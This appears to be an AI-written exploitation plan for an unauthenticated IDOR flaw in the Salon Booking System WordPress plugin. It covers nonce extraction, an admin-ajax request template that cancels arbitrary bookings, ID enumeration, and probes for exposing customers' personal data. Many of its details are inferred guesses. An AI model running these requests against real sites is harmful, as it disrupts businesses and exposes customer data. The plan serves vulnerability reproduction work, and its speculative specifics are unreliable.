Salon Booking System – Free Version <= 10.30.24 - Unauthenticated Insecure Direct Object Reference

This research plan outlines the process for analyzing and exploiting CVE-2026-40768, an Insecure Direct Object Reference (IDOR) in the Salon Booking System plugin.

1. Vulnerability Summary

The Salon Booking System – Free Version (up to 10.30.24) fails to adequately validate ownership or authorization when processing certain booking-related actions through unauthenticated AJAX endpoints. Specifically, the vulnerability allows an unauthenticated user to perform actions (likely cancellation or modification) on any booking record by supplying its ID, as the "user-controlled key" (token or ID) is not properly verified against the session or the specific object.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• Action: sln_cancel_reservation (inferred primary target) or potentially sln_update_booking_status.
• Vulnerable Hooks: wp_ajax_nopriv_sln_cancel_reservation or wp_ajax_nopriv_sln_booking_cancel.
• Payload Parameter: id (The booking ID) and potentially a dummy or missing token.
• Authentication: Unauthenticated (No login required).
• Preconditions: A booking must exist in the system.

3. Code Flow

1. The plugin registers unauthenticated AJAX handlers in its main initialization (likely in src/SLN/Action/Ajax.php or src/SLN/Hook/Ajax.php).
2. An unauthenticated request triggers a callback such as SLN_Action_Ajax_CancelReservation::execute() or sln_cancel_reservation().
3. The code retrieves the booking ID from $_POST['id'] or $_GET['id'].
4. The Flaw: The code checks for the existence of a token or key parameter but fails to verify that this token is cryptographically tied to that specific booking_id or the current requester’s session.
5. The system calls $booking->cancel() or updates the post status of the booking ID provided by the attacker.

4. Nonce Acquisition Strategy

While many nopriv actions in this plugin require a nonce for basic CSRF protection, the IDOR itself bypasses the logic intended to ensure the right user is acting on the right booking.

1. Identify Trigger: The plugin enqueues its AJAX scripts on pages containing the booking form shortcode: [salonbooking].
2. Setup Page: Create a public page with the shortcode:
   wp post create --post_type=page --post_status=publish --post_title="Booking" --post_content='[salonbooking]'
3. Navigate: Use browser_navigate to visit the newly created page.
4. Extract Nonce: The plugin localizes its configuration in a global JS object.
   • Inferred JS Variable: SLN_JS or salon_booking_vars.
   • Extraction Command: browser_eval("window.SLN_JS?.nonce || window.salon_booking_vars?.nonce").

5. Exploitation Strategy

The goal is to cancel a booking belonging to another user (or a test booking) without possessing the legitimate secret token usually sent in confirmation emails.

Request Template:

• Method: POST
• URL: http://<target>/wp-admin/admin-ajax.php
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=sln_cancel_reservation&id=[TARGET_BOOKING_ID]&nonce=[EXTRACTED_NONCE]
  

  (Note: If a token parameter is required by the code but not validated, add &token=invalid or &token=).

Steps:

1. Enumerate IDs: Determine a valid booking ID (e.g., ID 1, 2, or 100).
2. Send Request: Execute the http_request tool with the parameters above.
3. Analyze Response: A successful exploit will typically return a JSON response: {"status":"success"} or 1.

6. Test Data Setup

1. Install Plugin: Ensure salon-booking-system version 10.30.24 is active.
2. Create a Booking:
   • Use the wp post create command to create a sln_booking post type entry (the internal post type name might be sln_reservation or booking - verify with wp post-type list).
   • Alternatively, use the frontend booking form to create a "target" booking.
3. Verify Target: Note the ID of the created booking: wp post list --post_type=sln_booking.

7. Expected Results

• Successful Exploitation: The booking status in the database changes from confirmed or pending to cancelled.
• Response Content: The AJAX endpoint returns a success indicator without requiring the unique per-booking token that is normally required for guest cancellations.

8. Verification Steps

1. Check Post Status:
   wp post get [TARGET_BOOKING_ID] --field=post_status
   (Expected: cancelled or the plugin's internal equivalent).
2. Check Meta:
   wp post meta get [TARGET_BOOKING_ID] status
   (The plugin often stores its own status in meta).

9. Alternative Approaches

If sln_cancel_reservation is not the vulnerable action, investigate:

• sln_get_booking_details: Check if it allows unauthenticated viewing of customer names/emails/phones by IDOR.
• sln_save_customer_note: Check if an attacker can append notes to any booking ID.
• Search for wp_ajax_nopriv:
  grep -rn "wp_ajax_nopriv" . in the plugin directory to find all unauthenticated entry points and test each for an id or booking_id parameter that lacks ownership verification.